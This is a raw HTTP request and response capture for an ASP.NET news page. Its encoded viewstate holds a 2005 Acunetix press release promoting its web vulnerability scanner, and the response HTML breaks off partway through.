Request Body - size: 10,945 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30642
Response Body - size: 30,642 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbm